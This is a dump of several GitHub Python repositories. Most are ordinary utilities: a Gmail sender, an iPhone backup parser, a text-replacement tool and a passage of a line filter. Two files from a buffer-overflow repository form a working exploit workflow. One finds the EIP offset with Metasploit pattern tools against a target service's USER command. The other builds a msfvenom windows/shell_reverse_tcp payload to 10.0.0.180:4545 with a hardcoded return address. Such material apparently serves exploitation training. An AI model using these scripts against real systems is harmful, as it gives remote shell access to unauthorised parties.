metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "13alvone/cspeakes_buffer_overflow",
"score": 3
} |
#### File: 13alvone/cspeakes_buffer_overflow/py27_ver.py
```python
from __future__ import print_function
from sys import stdout
import socket
import time
import sys
import os
# CHECK FOR CORRECT NUMBER OF ARGUMENTS =================================================
if len(sys.argv) != 3:
print('[TEST_FOR_OVERFLOW_LOCATION]')
print('[Usage]: python cspeakes_buffer.py <target_ip> <target_port>')
exit()
# GLOBAL VARIABLES ======================================================================
ip_addr = sys.argv[1] # IP Addr we are pointing to
STATIC_LEN = 6000 # Max buffer we are testing for
port = int(sys.argv[2]) # Port to send the payload to
reg_word_test = '' # User Defined Later in the program
register_candidate = '' # User Defined STR used for final report only
second_offset = '' # Used to derive distance from offset to second_offset
bad_chars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
# CUSTOM FUNCTIONS ======================================================================
def send_var(var):
try:
start_time = time.time()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10.0) # Timeout in seconds (S)
connect = s.connect((ip_addr,port))
s.recv(1024)
s.send('USER ' + str(var) + '\r\n') # <REFACTOR> if target requires different syntax/proto
s.recv(1024)
#s.send('PASS ' + var + '\r\n') # <REFACTOR> if target requires different syntax/proto
#s.send('QUIT\r\n') # <REFACTOR> if target requires different syntax/proto
s.close()
print('Success! Maybe....\n')
except socket.timeout:
print("Connection Timed Out!")
exit()
def print_initial_output(offset, EIP_REG_0, ascii_location, B, U, FF, ER):
msg = '# =============================================================\n'
msg += '# Current Offset: ' + str(offset) + '\n'
msg += '# EIP register\'s value @Crash: ' + str(EIP_REG_0) + '\n'
msg += '# EIP register Value : ' + B + U + FF + ER + '\n'
msg += '# From Big to Little Endian: ' + ER + FF + U + B + '\n'
print(msg)
def continue_msg():
msg = '\n# ***************************\n'
msg += 'Perform the following steps before moving onward:\n'
msg += '1. Reboot [WINDOWS]\n2. Open Immunity\n'
msg += '3. Attach to the target process\n4. Un-pause Immunity\n'
msg += 'Please type "go" when you have completed these steps'
msg += 'or type "cancel" to exit the program\n'
msg += '# ***************************\n'
response = raw_input(msg)
response = response.lower()
if response == 'cancel':
exit(0)
elif response == 'go':
pass
while response != 'go':
try_again = 'Please type only "go" to continue or "cancel" to stop everything:\n'
response = raw_input(try_again)
if response == 'cancel':
exit(0)
def increase_len_msg():
global STATIC_LEN
msg = '# =============================================================\n'
msg += 'Your current buffer length is set to 6000 bytes.\n'
msg += 'Would you like to increase that to widen the buffer? (Y|N)\n'
response = raw_input(msg)
response = response.lower()
if response == 'y' or response == 'yes':
msg = 'Please enter the length in ascii characters you would like:\n'
msg += '\t***Remember*** each ascii character == 1 byte ******\n'
try:
response = raw_input(msg)
output = int(response)
except:
output = 'error'
else:
output = STATIC_LEN
return output
def main():
global register_candidate
global STATIC_LEN
global bad_chars
print('STEP 0 ==================================================')
intro_msg = '[TESTING FOR OVERFLOW LOCATION to LENGTH == ' + str(STATIC_LEN) + ']\n'
print(intro_msg)
sys_command = '/usr/share/metasploit-framework/'
sys_command += 'tools/exploit/pattern_create.rb -l ' + str(STATIC_LEN)
print('The command used to generate random, non-repeating string is:')
print(sys_command)
var = os.popen(sys_command).read()
send_var(var)
EIP_REG = raw_input('Please input the EIP Register value the program failed on: ')
print('\nSTEP 1 ==================================================')
B = str(EIP_REG[:2].lower())
U = str(EIP_REG[2:4].lower())
FF = str(EIP_REG[4:6].lower())
ER = str(EIP_REG[6:8].lower())
ascii_location = str(chr(int(ER,16))) + str(chr(int(FF,16))) + \
str(chr(int(U,16))) + str(chr(int(B,16)))
sys_command = '/usr/share/metasploit-framework/'
sys_command += 'tools/exploit/pattern_offset.rb -l '
sys_command += str(STATIC_LEN) + ' -q ' + str(ascii_location)
sys_command_output = os.popen(sys_command).read()
offset = sys_command_output.split(' ')
offset = int(offset[len(offset) - 1].strip('\n'))
print_initial_output(offset, EIP_REG, ascii_location, B, U, FF, ER)
print('STEP 2 ==================================================\n')
test_chars = raw_input('Please input 4 ASCII Chars for testing offset: ')
reg_word_test = str(test_chars)
_buffer = []
for char in test_chars:
_buffer.append(char.encode('hex'))
B = str(_buffer[0])
U = str(_buffer[1])
FF = str(_buffer[2])
ER = str(_buffer[3])
B_U_FF_ER = B + U + FF + ER
ER_FF_U_B = ER + FF + U + B
new_var = ('A' * offset) + str(reg_word_test) + ('C' * 90)
msg = 'The updated variable now becomes....\n'
msg += "new_var = (\'A\' * offset) + \"" + str(reg_word_test)
msg += "\" + (\'C\' * 90)\n\n"
continue_msg()
print('STEP 3 ==================================================\n')
send_var(new_var)
msg = '[CONFIRM HERE] - Your EIP register should read: ' + str(ER_FF_U_B) + '\n'
msg += 'Look for any Register containing an address that points to the beginning,\n'
msg += 'or anywhere remotely close to the beginning of your [A] or [C] buffer zones.\n'
msg += 'This will be a good spot, to most likely place our shellcode.\n'
msg += '\n*** ALSO NOTE Make sure we have at least 400 bytes between this addr\n'
msg += 'and the end of your total buffer. (ie. last addr of last [C] buffer component)\n'
msg += 'Otherwise, you need to incrase the "length" variable found in "configuration"\n\n'
print(msg)
new_len = increase_len_msg()
while new_len == 'error':
new_len = increase_len_msg()
# POTENTIAL REFACTOR might be needed here if there is a different target
payload = ('A' * offset) + str(reg_word_test) + bad_chars + ((new_len - STATIC_LEN) * 'C')
msg = 'The updated variable now becomes....\n'
msg += "new_var = (\'A\' * offset) + \"" + str(reg_word_test)
msg += "\" + bad_chars)\n\n"
msg += '\t***Please note, final buffer written to \"cs.payload\"\n'
msg += '\t***Also, the bad_chars were added to aide in the next step.\n'
f_out = open('cs.payload','w')
f_out.write(payload)
f_out.close()
print(msg)
print('==============PROCEED TO NEXT CSPEAKES SCRIPT==================\n')
msg = 'You must now focus!\nYou now have to find a good return address.\n'
msg += 'to replace into the EIP register. This address should point to near\n'
msg += 'the beginning of one of your A or C buffers but leaves 350-400 bytes.\n'
msg += 'REMEMBER THE BOOK: "If we can find an accessible, reliable address in\n'
msg += 'memory that contains an instruction such as JMP ESP, we could jump to it,\n'
msg += 'and in turn end up at the address pointed to, by the ESP register, at the time of the jump\n\n'
msg += 'Time to use .... cspeakes_badCharTest.py\n\nThis will help find bad chars.\n\nGodspeed!\n\n'
print(msg)
if __name__ == "__main__":
main()
```
#### File: 13alvone/cspeakes_buffer_overflow/test.py
```python
import os
def execute_command(_sys_command):
print(f'[+] Command Used:\n[+] # user@pwn> {_sys_command}\n')
var_return = os.popen(_sys_command).read()
return var_return
def build_final_payload():
global ip, port
sys_command = f'msfvenom --payload windows/shell_reverse_tcp LHOST=10.0.0.180 LPORT=4545 ' \
f'EXITFUNC=thread -f c -a x86 --platform windows -b "\\x00\\x0a\\x0d\\xff" -n 20'
shellcode = execute_command(sys_command)
shellcode = ((''.join(shellcode.split('\n')[1:-1])).replace(';', '')).replace('"', '')
shellcode = bytes.fromhex(shellcode.replace('\\x', ''))
_a_buff = 'A' * 20
_c_buff = 'C' * 20
eip_le = bytes.fromhex('fb41bd7c')
a_buff_hex, b_buff_hex, c_buff_hex = '', '', ''
for a in _a_buff:
a_buff_hex += hex(ord(a)).replace('0x','')
for c in _c_buff:
c_buff_hex += hex(ord(c)).replace('0x','')
a_buff_hex = bytes.fromhex(a_buff_hex)
c_buff_hex = bytes.fromhex(c_buff_hex)
f_payload = a_buff_hex + eip_le + shellcode + c_buff_hex
#f_payload = bytearray.fromhex(f_payload).decode('iso-8859-1')
print(eip_le, '\n')
print(f_payload)
if __name__ == "__main__":
build_final_payload()
``` |
{
"source": "13alvone/gmailrunner",
"score": 2
} |
#### File: 13alvone/gmailrunner/gmail_cli_push.py
```python
from django.core.exceptions import ValidationError
from django.core.validators import URLValidator
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
from email import encoders
from pathlib import Path
import argparse
import logging
import smtplib
import ssl
import os
import re
# Global Variables
email_message = MIMEMultipart()
email_message['From'] = '<From Email Address>'
email_message['To'] = '<To Email Address>'
context = ssl.create_default_context()
passwd = os.<PASSWORD>('GMAIL') # Define your local password as environment variable
smtp_server = "smtp.gmail.com"
port = 465 # TLS --> OR OPTION: SSL 465
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--subject', help='Email Subject Line', default='BLANK', type=str, required=False)
parser.add_argument('-o', '--object', help='File or Web Path', type=str, required=True)
arguments = parser.parse_args()
return arguments
def attach_file(__object):
part = MIMEBase('application', "octet-stream")
with open(__object, 'rb') as file_in:
part.set_payload(file_in.read())
encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename="{}"'.format(Path(__object).name))
email_message.attach(part)
file_in.close()
def is_valid_url(__object):
try:
URLValidator()(__object)
return True
except ValidationError as e:
logging.info(e)
return False
def send_message(__object,):
global email_message, context, passwd, smtp_server, port
with smtplib.SMTP_SSL(smtp_server, port, context=context) as server:
server.login(email_message['From'], passwd)
formatted_message = f'subject:{__object["subject"]}\n{__object}'
server.sendmail(email_message['From'], email_message['To'], formatted_message)
def main():
global email_message, context, passwd, smtp_server, port
args = parse_args()
subject = args.subject
_object = args.object
email_message['Subject'] = subject
if is_valid_url(_object) or (isinstance(_object, str) and re.match('^http', _object)):
email_message.attach(MIMEText(_object))
send_message(email_message)
else:
print(hasattr(_object, 'r'))
attach_file(_object)
send_message(email_message)
if __name__ == '__main__':
main()
``` |
{
"source": "13alvone/iphone_backup_parser",
"score": 3
} |
#### File: 13alvone/iphone_backup_parser/iphone_backup_parser.py
```python
import subprocess
import plistlib
import argparse
import sqlite3
import logging
import magic
import math
import time
import re
import os
# Global Variables
start_time = time.time()
report_list = []
url_set = set()
output_database = {}
file_walk_database = {}
sms_db_hash = None
sms_database = {}
magic_generator = magic.Magic(flags=magic.MAGIC_MIME_TYPE)
url_block_list = [
'content.icloud.com',
]
def is_sqlite3(_path):
process = subprocess.run(['file', _path], check=True, stdout=subprocess.PIPE, universal_newlines=True)
output = f'{process.stdout}'.lower()
if 'sqlite' in output:
return True
else:
return False
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--file_path', help='Target SQLite3 Path', type=str, required=True)
arguments = parser.parse_args()
return arguments
def print_elapsed_time(_start_time):
seconds = round(int(time.time() - _start_time), 2)
minutes = math.trunc(seconds / 60)
remaining_seconds = math.trunc(seconds - (minutes * 60))
if len(f'{remaining_seconds}') != 2:
remaining_seconds = f'0{remaining_seconds}'
elapsed_time = f'{minutes}:{remaining_seconds}'
print(f'[i] Total_Time Elapsed: {elapsed_time}')
def convert_sqlite3_to_sql_dict(_path):
result_dict = {}
conn = sqlite3.connect(_path)
cursor = conn.cursor()
cursor.execute('SELECT name from sqlite_master where type="table"')
tables = cursor.fetchall()
for table in tables:
table_name = table[0]
qry = f'SELECT * from "{table_name}"'
cursor.execute(qry)
contents = cursor.fetchall()
for content in contents:
uuid = content[0]
key = f'{table_name}_{uuid}'
result_dict[key] = content
return result_dict
def iterate_sql_dict(_sqlite3_dict):
global report_list, sms_database
for key in _sqlite3_dict:
report_list.append(f'[+] Item: {key}\n')
if isinstance(_sqlite3_dict[key], dict):
iterate_sql_dict(_sqlite3_dict[key])
else:
data_body = _sqlite3_dict[key]
report_list.append(f'[^] {data_body}\n')
try:
generate_cleaned_manifest_entry(data_body, print_item=False) # Do Iterative Action From Here Down...
except:
pass
if sms_db_hash:
sms_database[key] = data_body
def global_filter(_obj):
global url_set, url_allow_list
if isinstance(_obj, int) or isinstance(_obj, str):
re_extract_urls(_obj)
return _obj
elif isinstance(_obj, bytes):
_obj_raw_ascii = _obj.decode('ascii', 'ignore')
if 'bplist' in _obj_raw_ascii:
try:
_obj = plistlib.loads(_obj, fmt=None, dict_type=dict)
re_extract_urls(_obj)
except:
pass
return _obj
elif isinstance(_obj, dict):
re_extract_urls(_obj)
for key in _obj:
_obj[key] = global_filter(_obj[key])
return _obj
elif isinstance(_obj, list) or isinstance(_obj, tuple):
re_extract_urls(_obj)
new_list = []
for item in _obj:
new_list.append(global_filter(item))
_obj = new_list
return _obj
elif isinstance(_obj, set):
re_extract_urls(_obj)
new_set = set()
for item in _obj:
new_set.add(global_filter(item))
_obj = new_set
return _obj
def generate_cleaned_manifest_entry(_data_body, print_item=True):
global output_database, sms_db_hash
serial = _data_body[0]
directory_data = 'Unknown'
data_type = 'Unknown'
manifest_entry_dict = {
'path': directory_data,
'domain': _data_body[1],
'sql_entry': _data_body[2],
'unknown_number': _data_body[3],
'data': _data_body[4],
'type': data_type,
}
output_database[serial] = manifest_entry_dict
try:
if 'sms.db' in manifest_entry_dict['sql_entry']:
sms_db_hash = serial
except TypeError:
pass
if print_item:
msg = f'{"-" * 50}\n[+] {serial}\n' \
f'[^] Directory:\t{manifest_entry_dict["directory"]}\n' \
f'[^] Domain:\t{manifest_entry_dict["domain"]}\n' \
f'[^] SQL Entry:\t{manifest_entry_dict["sql_entry"]}\n' \
f'[^] Unknown:\t{manifest_entry_dict["unknown_number"]}\n' \
f'[^] Manifest Data:\t{manifest_entry_dict["manifest_data"]}\n' \
f'[^] Type:\t{manifest_entry_dict["type"]}'
print(msg)
def add_url(_url):
global url_set, url_block_list
for blocked_url in url_block_list:
if blocked_url in _url:
return None
url_set.add(_url)
def re_extract_urls(_data):
try:
if isinstance(_data, list) or isinstance(_data, tuple) or isinstance(_data, set):
for entry in _data:
url_list = re.findall(r'(https?://\S+)', entry)
for url in url_list:
add_url(url)
elif isinstance(_data, dict):
for key in _data:
url_list0 = re.findall(r'(https?://\S+)', key)
url_list1 = re.findall(r'(https?://\S+)', _data[key])
for url in url_list0:
add_url(url)
for url in url_list1:
add_url(url)
elif isinstance(_data, str):
url_list = re.findall(r'(https?://\S+)', _data)
for url in url_list:
add_url(url)
elif isinstance(_data, bytes):
url_list = re.findall(r'(https?://\S+)', _data.decode('ascii', 'ignore'))
for url in url_list:
add_url(url)
except TypeError as e:
logging.info(e)
def process_data_set(_sqlite3_dict, print_report=False):
global report_list
report_list.clear()
iterate_sql_dict(_sqlite3_dict)
if print_report:
for entry in report_list:
print(entry)
def walk_the_backup(_path):
global file_walk_database
target_path = '/'.join(_path.split('/')[:-1])
for root, dirs, files in os.walk(target_path, topdown=False):
for filename in files:
full_path = f'{root}/{filename}'
file_walk_database[filename] = full_path
def print_types_dict(_input_dict):
for key in _input_dict:
print(f'[+] MIME Type: {key}\t\t{_input_dict[key]}')
def filter_by_domain_str(_filter_str, print_types=False):
global output_database
result_dict = {}
type_dict = {}
for key in output_database:
if output_database[key]['path'] != 'Unknown' and output_database[key]['domain'] == _filter_str:
if print_types:
print(f'[+] {key}\n[^] {output_database[key]}\n{"-" * 50}\n')
result_dict[key] = output_database[key]
if output_database[key]['type'] not in type_dict:
type_dict[output_database[key]['type']] = 1
elif output_database[key]['type'] in type_dict:
type_dict[output_database[key]['type']] += 1
if print_types:
print_types_dict(type_dict)
return result_dict
def filter_manifest_by_mime_type(_mime_type_str, print_report=False): # This is a `contains` filter
global output_database
result_dict = {}
type_dict = {}
for key in output_database:
if output_database[key]['path'] != 'Unknown' and _mime_type_str in output_database[key]['type']:
if print_report:
print(f'[+] {key}\n[^] {output_database[key]}\n{"-" * 50}\n')
result_dict[key] = output_database[key]
if output_database[key]['type'] not in type_dict:
type_dict[output_database[key]['type']] = 1
elif output_database[key]['type'] in type_dict:
type_dict[output_database[key]['type']] += 1
if print_report:
print_types_dict(type_dict)
return result_dict
def filter_manifest_by_sql_entry(_sql_entry_str, print_report=False): # This is a `contains` filter
global output_database
result_dict = {}
type_dict = {}
for key in output_database:
if output_database[key]['path'] != 'Unknown' and _sql_entry_str in output_database[key]['sql_entry']:
if print_report:
print(f'[+] {key}\n[^] {output_database[key]}\n{"-" * 50}\n')
result_dict[key] = output_database[key]
if output_database[key]['type'] not in type_dict:
type_dict[output_database[key]['type']] = 1
elif output_database[key]['type'] in type_dict:
type_dict[output_database[key]['type']] += 1
if print_report:
print_types_dict(type_dict)
return result_dict
def copy_to_tmp(_output_database):
target_path = f'{time.strftime("%Y%m%d-%H%M%S")}_output'
subprocess.run(f'mkdir {target_path}', shell=True, check=True, stdout=subprocess.PIPE)
for key in _output_database:
filename = output_database[key]['sql_entry'].split('/')[-1].replace(' ', '_')
file_path = output_database[key]['path']
cmd = f'cp "{file_path}" "{target_path}/{filename}"'
subprocess.run(cmd, shell=True, check=True, stdout=subprocess.PIPE)
def examine_and_process_db_file(_file_path, print_report=False):
global output_database
output_database = {}
if is_sqlite3(_file_path):
sqlite3_dict = convert_sqlite3_to_sql_dict(_file_path)
if print_report:
process_data_set(sqlite3_dict, print_report=True)
else:
process_data_set(sqlite3_dict)
walk_the_backup(_file_path)
else:
logging.info(f'[!] The following supplied file path is not SQLite3\n{_file_path}\n')
def add_metadata_to_db_file():
global file_walk_database
sha1_file_set = set(file_walk_database.keys())
for key in output_database:
if key in sha1_file_set:
location = file_walk_database[key]
file_type = magic_generator.id_filename(location)
output_database[key]['path'] = location
output_database[key]['type'] = file_type
def process_url_file():
global sms_database, output_database, sms_database, url_set
if sms_db_hash is not None:
_path = output_database[sms_db_hash]['path']
examine_and_process_db_file(_path)
for key in sms_database:
sms_database[key] = global_filter(sms_database[key])
f_out = open('urls.txt', 'w')
for url in url_set:
f_out.write(f'{url}\n')
f_out.close()
def main():
global start_time
args = parse_args()
file_path = args.file_path
examine_and_process_db_file(file_path)
add_metadata_to_db_file()
# filter_manifest_by_domain_str('RootDomain', print_report=True) # Filter By Domain String Example
# filter_manifest_by_mime_type('text/plain', print_report=True) # Filter By MIME Extension Type Example
# filter_manifest_by_sql_entry('sms.db', print_report=True) # Filter By SQL Entry String Example
# Copy Images Example
# filter_manifest_by_mime_type('image', print_report=True) # Filter Only Images for Image Copy Next
# copy_to_tmp(output_database) # Copy ALL MIME Image Type Files to /tmp
process_url_file()
print_elapsed_time(start_time)
if __name__ == "__main__":
main()
``` |
{
"source": "13am/ezreplace",
"score": 3
} |
#### File: ezreplace/src/ezreplace.py
```python
from argparse import ArgumentParser
import sys
import tempfile
import os
import shutil
from signal import signal, SIGPIPE, SIG_DFL
signal(SIGPIPE,SIG_DFL)
def parse_options():
parser = ArgumentParser()
parser.add_argument('--in',
dest='infile',
default=None,
help='Name of the input file to be modified. Leave out if you want to read \
the input from stdin.')
parser.add_argument('--out',
dest='outfile',
default=None,
help='Name of the output file. Leave out if you want to write \
the output to stdout.')
parser.add_argument('--in-place',
dest='in_place',
default=False,
action="store_true",
help='Save modifications in-place to the original file given with --in.')
parser.add_argument('--replacements',
dest='replacements',
default=None,
help='Name of the file containing (line by line) pairs of \"old new\" replacements.')
parser.add_argument('--default-replacement',
dest='default_replacement',
default=None,
help='Value to use when the value was not found in --replacements. Default: keep as is.')
parser.add_argument('--header',
dest='header',
default=False,
action="store_true",
help='Do not modify the first (header) line of the input file.')
parser.add_argument('--strip',
dest='strip',
default=False,
action="store_true",
help='Strip leading and trailing whitespace characters from the lines of the input file.')
parser.add_argument('--keep-hits-only',
dest='keep',
default=False,
action="store_true",
help='Only output lines where a replacement was made. Default = False.')
parser.add_argument('--column',
dest='column',
default=False,
help='Replace only in this specified column. The leftmost is column 1 etc.\
Multiple columns can be given by separating the column indexes with a comma, \
e.g. --column 1,2,5 would only replace in the first, second, and fifth columns and \
ignore matches elsewhere. If --column is not given, replacements are done as follows: \
1\) the targets to be replaced are sorted alpabetically \
2\) for each line, replacements are made in alphabetical order and replacements \
once made are NOT recursively replaced again. \
E.g.input line "dog lion cat cat tennis" \
with replacements "cat:tennis , tennis:football" would first replace "cat" with "tennis": \
"dog lion [tennis] [tennis] tennis" \
but only the original occurrence of "tennis" would be replaced by "football": \
"dog lion [tennis] [tennis] [football]" \
so that the final output line would be \
"dog lion tennis tennis football".')
parser.add_argument('--sep',
dest='sep',
default=False,
help='Use a specific string as field delimiter. \
In effect only if --column also specified. \
If not given, ezreplace will try to guess the separator and \
stops if it cannot make a good guess. \
Possible values are "tab", "space", "whitespace", or any string \
such as "this script is awesome" or ";" enclosed in quotes. If you use the \
"whitespace" keyword as the separator, continuous stretches of any whitespace \
characters will be used as field separators in the input and the output will be \
separated by single spaces.')
options = parser.parse_args()
return options
def deduce_delimiter(lines=[], strip=False):
space = set()
tab = set()
whitespace = set()
for ip_line in lines:
if strip:
ip_line = ip_line.strip()
tab.add(len(ip_line.split("\t")))
space.add(len(ip_line.split(" ")))
whitespace.add(len(ip_line.split(None)))
if 1 in space:
space.remove(1)
if 1 in tab:
tab.remove(1)
if 1 in whitespace:
whitespace.remove(1)
if len(tab) == 1 and len(space) != 1:
sep = "\t"
elif len(tab) != 1 and len(space) == 1:
sep = " "
elif len(whitespace) == 1:
sep = None
else:
sys.stderr.write('# Field separator not explicitly given and was not \
successfully deduced.\n')
sys.stderr.write('# Stopping.\n')
sys.exit()
sys.stderr.write('# Field separator successfully deduced.\n')
return sep
class Replacer:
def __init__(self):
self.exp_line_len = None
self.linecounter = 0
self.word_order = None
self.default_replacement = None
def check_line_len(self, line):
if self.exp_line_len is None:
self.exp_line_len = len(line)
return True
else:
return len(line) == self.exp_line_len
def set_default(self, val):
self.default_replacement = val
def replace_line(self, kwargs, ip_line=None, is_header=False):
if kwargs['strip']:
ip_line = ip_line.strip()
if kwargs['column'] is False:
op_line = [ip_line]
targets = [0]
if self.word_order is None:
self.word_order = sorted(kwargs['reps'].keys())
else:
op_line = ip_line.split(kwargs['sep'])
targets = kwargs['column']
if self.check_line_len(op_line) is not True:
sys.stderr.write('# Error: the number of columns in the input is not constant.\n')
sys.stderr.write('# Found {} columns on line {}.\n'\
.format(len(op_line), self.linecounter + 1 ))
sys.stderr.write('# Expected {} columns.\n'.format(self.exp_line_len))
sys.stderr.write('# Exit.\n')
return False
replaced = False
if is_header == False or kwargs['header'] == False:
# if replacing is NOT restricted to specific columns,
# replace everywhere on the line but do not multiple
# replacements of the same word
if kwargs['column'] is False:
for w in self.word_order:
ol = []
for i in op_line:
if type(i) != type('') or w not in i:
ol.append(i)
else:
for j in i.split(w):
ol.append(j)
ol.append([w])
ol.pop()
op_line = ol
ol = ''
for i in op_line:
if type(i) == type(''):
if i != '':
ol = ol + i
else:
replaced = True
kwargs['rep_counter'] += 1
replacement = kwargs['reps'][i[0]]
ol = ol + replacement
op_line = [ol]
# if replacement is to be done in specific columns,
# just get the replacements from the dict
else:
for i in targets:
try:
op_line[i] = kwargs['reps'][op_line[i]]
kwargs['rep_counter'] += 1
replaced = True
except KeyError:
kwargs['not_rep_counter'] += 1
if self.default_replacement is not None:
op_line[i] = self.default_replacement
if replaced:
kwargs['n_line_match'] += 1
else:
kwargs['n_line_no_match'] += 1
op = kwargs['opstream']
op_sep = kwargs['op_sep']
do_write_output = is_header or kwargs['keep'] == False or replaced
if do_write_output:
op.write(op_sep.join(op_line))
if kwargs['strip'] or kwargs['sep'] == None:
op.write('\n')
self.linecounter += 1
return True
def update_delimiters(options = None, start_lines = None):
# input field delimiter
if options.column is not None:
if options.sep == False:
options.sep = deduce_delimiter(lines = start_lines, strip = options.strip)
else:
if options.sep == 'whitespace':
options.sep = None
else:
if options.sep == 'space':
options.sep = ' '
if options.sep == 'tab':
options.sep = '\t'
# output field delimiter
if options.column is None:
options.op_sep = ''
else:
if options.sep == None:
options.op_sep = ' '
else:
options.op_sep = options.sep
return vars(options)
class Collect:
def __init__(self, kwargs):
self.__dict__.update(kwargs)
def finish(success, kwargs):
options = Collect(kwargs)
# close streams
if options.infile is not None:
options.ipstream.close()
if options.in_place and success:
tmp_name = options.opstream.name
options.opstream.close()
info_line = "# In-place modify: replacing {} with the tmp file {}.\n"\
.format(options.infile, tmp_name)
sys.stderr.write(info_line)
try:
os.rename(tmp_name, options.infile)
except OSError:
try:
sys.stderr.write("# Using shutil.move.\n")
shutil.move(tmp_name, options.infile)
except:
sys.stderr.write("# Replacement unsuccessful.\n")
elif options.outfile is not None:
options.opstream.close()
else:
pass
# show some statistics
if success:
sys.stderr.write("# Replaced {} words.\n".\
format(kwargs['rep_counter']))
if kwargs['column'] is not False:
sys.stderr.write("# No replacement was found for {} words.\n"\
.format(kwargs['not_rep_counter']))
sys.stderr.write("# {} lines had at least one word replaced.\n"\
.format(kwargs['n_line_match']))
sys.stderr.write("# {} lines did not have any replacements made.\n"\
.format(kwargs['n_line_no_match']))
sys.stderr.write("# Done.\n")
sys.exit()
def main():
options = parse_options()
# set up the input
if options.infile is not None:
ip = open(options.infile, 'r')
else:
ip = sys.stdin
if options.in_place:
sys.stderr.write('# --in-place can only be used \
together with --in to specify the input file name.\n')
sys.exit()
options.ipstream = ip
# set up output
if options.in_place:
op = tempfile.NamedTemporaryFile(mode='w+t', delete=False)
elif options.outfile is not None:
op = open(options.outfile, 'w')
else:
op = sys.stdout
options.opstream = op
# parse the column notation
if options.column is not False:
options.column = [int(i.strip()) - 1
for i in options.column.split(',')]
# read the replacements into a dict
reps = {}
with open(options.replacements, 'r') as f:
for line in f:
line = line.strip()
if line != '':
line = line.split()
assert len(line) == 2
reps[line[0]] = line[1]
options.reps = reps
info_line = "# {} replacements read from {}.\n"
info_line = info_line.format(len(options.reps), options.replacements)
sys.stderr.write(info_line)
options.rep_counter = 0
options.not_rep_counter = 0
options.n_line_match = 0
options.n_line_no_match = 0
replacer = Replacer()
start_lines = []
kwargs = {}
# always read the first 666 lines into memory
for ip_line in options.ipstream:
if len(start_lines) < 666:
start_lines.append(ip_line)
if len(start_lines) == 666:
break
# check how the input looks like to define the delimiters
kwargs = update_delimiters(options=options, start_lines=start_lines)
# process the lines
is_first_line = True
for ip in (start_lines, options.ipstream):
for line in ip:
ok = replacer.replace_line(kwargs,
ip_line=line,
is_header=is_first_line)
is_first_line = False
if not ok:
finish(False, kwargs)
finish(True, kwargs)
if __name__ == '__main__':
main()
``` |
{
"source": "13am/filter_lines",
"score": 4
} |
#### File: filter_lines/src/filter_lines.py
```python
from optparse import OptionParser
import sys
import operator
import os
def parse_options():
userinfo = '''
FILTER LINES
Examples:
A. Filter the file "f1.txt" by keeping all lines which contain any of
the words listed in the file "words.txt". Assume the file to be filtered
contains data in columns separated by spaces. Only use the values in the
first column of "f1.txt" to look for matches.
> filter_lines.py --in f1.txt --keep words.txt --sep space --column 1 --out filtered_f1.txt
B. Filter a file by values in colums. Assume the columns are named on the
first (header) line of the input file. Output the header line and lines
where either the "weight" column has a value greater than 13, or the value
of the "taste" column is "good", or both.
> filter_lines.py --in f1.txt --filters "weight>13,taste=good" --sep space --column 1 --out filtered_f1.txt
C. As above but now keep only lines where the "weight" column has a value
greater than 13 and the value of the "taste" column is "good".
> filter_lines.py --match-all --in f1.txt --filters "weight>13,taste=good" --sep space --column 1 --out filtered_f1.txt
'''
parser = OptionParser(usage=userinfo)
parser.add_option('--in', type='string',
action='store', dest='infilename', default=False,
help='The file to filter. If not specified, input \
is read from STDIN')
parser.add_option('--out', type='string',
action='store', dest='outfilename', default=False,
help='Name for the file where the target lines are written. \
If not specified, output is written to STDOUT')
parser.add_option('--keep', type='string',
action='store', dest='keep', default=False,
help='Keep lines containing a value listed in this file.')
parser.add_option('--remove', type='string',
action='store', dest='remove', default=False,
help='Remove lines containing a value listed in this file.')
parser.add_option('--column',
action='store', dest='column',
help='Specify the column to be searched for the values when using'
' --keep or --remove.'
' The leftmost is column 1 etc.'
' Multiple columns can be given by separating the column indexes'
' with a comma,'
' e.g. --column 1,2,5 would only search in the first,'
' second, and fifth columns and'
' ignore matches elsewhere.')
parser.add_option('--match-all',
action='store_true', dest='match_all', default=False,
help='If multiple fields specified with --column or --filters,'
' require that all columns produce a match'
' in order for the line itself to be counted as a match (i.e. use logical AND to join the conditions).'
' Otherwise by default a match with any condition is sufficient to produce a match (a logical OR is used).')
parser.add_option('--filter-columns',
action='store_true', dest='by_col', default=False,
help='Filter by column names (instead of values on rows) when using'
' --keep or --remove.')
parser.add_option('--excluded-out', type='string',
